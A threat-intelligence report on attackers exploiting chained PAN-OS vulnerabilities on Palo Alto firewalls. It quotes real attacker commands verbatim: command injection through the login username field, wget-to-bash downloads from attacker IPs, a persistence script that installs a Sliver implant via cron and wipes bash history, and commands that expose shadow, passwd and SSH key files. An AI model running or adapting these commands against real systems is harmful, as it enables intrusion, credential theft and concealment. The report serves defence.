Threat Campaign Targeting Palo Alto Networks Firewall Devices

On November 18, 2024, Palo Alto Networks disclosed the existence of two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A day later, watchTowr released a report providing technical details on how to chain the two vulnerabilities together to achieve remote code execution of these vulnerabilities. While they did not publish a proof-of-concept exploit, the details provided were sufficient to understand the exploitation process.

Several hours after the watchTowr report was published, Arctic Wolf Labs began to observe multiple intrusions affecting Palo Alto Networks devices. Based on the close timing of the watchTowr disclosure and additional evidence reviewed by Arctic Wolf Labs, we assess with moderate confidence that these intrusions likely involved the exploitation of CVE-2024-0012 chained together with CVE-2024-9474 for initial access.

We are sharing details of these intrusions to help organizations defend against these threats. Please note that we may add further detail to this article as we uncover additional information in our ongoing investigation.

What We Know About the Intrusions

Exploitation Details

Historically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially for perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin mass exploitation using the available technical details.

With the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting PAN devices immediately following the publication of relevant technical details. As described in the most recent watchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall log lines that we observed showing a Panorama console login where the username field includes a bash command enclosed in backticks:

1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME

Notably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.

• watchTowr.js
• watchTowr.php
• watchTowr.txt
• CVE20249474.php

Command and Control

Arctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen with CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to use curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead of domain names.

Several commands were observed in the most recent intrusions that indicated potential ingress tool transfer. One notable example is an instance where Sliver C2 was retrieved, an open-source alternative to the commonly used Cobalt Strike penetration testing tool.

wget --no-check-certificate -qO-https://104.131.69.106/vicidial/vicidial_sign.js|bash

The contents of the script (vicidial_sign.js) shown below has several key functions:

• Curl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and saves it to the /usr/lib/e_nas directory. If curl fails, it attempts to use wget instead.
• The touch command is used to change the modification and access timestamp of the /usr/lib/e_nas directory to match that of /usr/lib/php.ini, likely to hide the recent modification to the file.
• Any existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the same path.
• The script then checks if a process named cloud-lib is running (psgrep -x cloud_lib), and if not, it copies, /usr/lib/e_nas to the /usr/bin/cloud-lib directory, setting its permission to executable only by owner (chmod 700), then proceeds to run it in the background.
• The permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.
• The touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match /etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.
• Bash history is cleared to avoid evidence of the commands having been executed.

#!/bin/bash
curl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://104.131.69.106/vicidial/up.js -O /usr/lib/e_nas
touch -r  /usr/lib/php.ini /usr/lib/e_nas
echo '' > /etc/cron.hourly/telemetry.cron
echo '#!/bin/sh' > /etc/cron.hourly/telemetry.cron
echo "bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib &&  chmod 700 /usr/bin/cloud-lib && (/bin/cloud-lib &); fi'" >> /etc/cron.hourly/telemetry.cron
chmod 755 /etc/cron.hourly/telemetry.cron 
touch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron
echo "" > /root/.bash_history

The file (up.js) outlined in the section above is a UPX-packed Sliver payload.

Data Exfiltration

In observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive information from firewall devices. Most exfiltration data included firewall configuration files which are known to include hashed credentials. Additionally, some attempts were made to exfiltrate operating system passwd and shadow files.

Here is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:

cat /root/.ssh/authorized_keys > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’
cat /etc/networks > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’
arp -a > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’
cat /etc/passwd > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’
cat /etc/shadow > /var/appweb/htdocs/unauth/watchTowr.txt’

In some instances, threat actors archived the output of these files using the tar command:

tar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs
    

PHP Webshell

One of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:

1. When a HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called $oNvPH071PRH, which is a base64 encoded and XOR encrypted string.
2. Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it proceeds to execute through the PHP eval function.
3. The output is base64 encoded and XOR encrypted, and is padded with a header of the first 8 bytes consisting of the md5sum of 18f566d952acaa29, and with a footer of the last 8 bytes consisting of the md5sum of 18f566d952acaa29.

Coinminer Activity

Some cases involved the deployment of XMRig on compromised firewall devices.

Shortly after the retrieval and execution of the file, network traffic reaching out to known XMRig IP addresses was observed.

{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZXRruR7HFD7keebLdYj6Bf5xZKhFKFANFxZhj3BCmRT9pe4NG325b+50000","pass":"REDACTED","agent":"XMRig/6.18.0 (Linux x86_64) libuv/1.44.1 gcc/9.3.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}

How Arctic Wolf Protects its Customers

Arctic Wolf is committed to ending cyber risk with its customers, and when active ransomware campaigns are identified we move quickly to protect our customers.

Arctic Wolf Labs has leveraged threat intelligence around the exploitation of Palo Alto Networks devices to implement new detections in the Arctic Wolf Platform to protect Managed Detection and Response (MDR) customers. As we discover any new information, we will enhance our detections to account for additional indicators of compromise and techniques leveraged by this threat actor.

Remediation

For more details on recommended actions to address these vulnerabilies, see our security bulletin here.

Conclusion

Threat actors don’t wait around once new vulnerabilities are disclosed, especially for perimeter devices such as firewalls and VPN gateways. Across different campaigns and vulnerabilities, similar patterns emerge that help defenders react early in the kill chain.

The activities we’ve highlighted here are only scratching the surface. In this campaign, we’ve observed exfiltration of device configurations and credentials, along with the deployment of various payloads including coinminers, botnet malware, PHP webshells, and C2 frameworks. These observations illustrate the many ways that opportunistic threat actors attempt to leverage these vulnerabilities, for financial gain and otherwise.

Defenders should implement robust external monitoring and alerting for perimeter devices. In particular, close attention should be paid to unusual HTTP activity on such devices as it emerges. Additionally, as recommended by Palo Alto Networks, management interfaces of firewalls should not be exposed on the public internet, and should be restricted to only trusted internal IP addresses.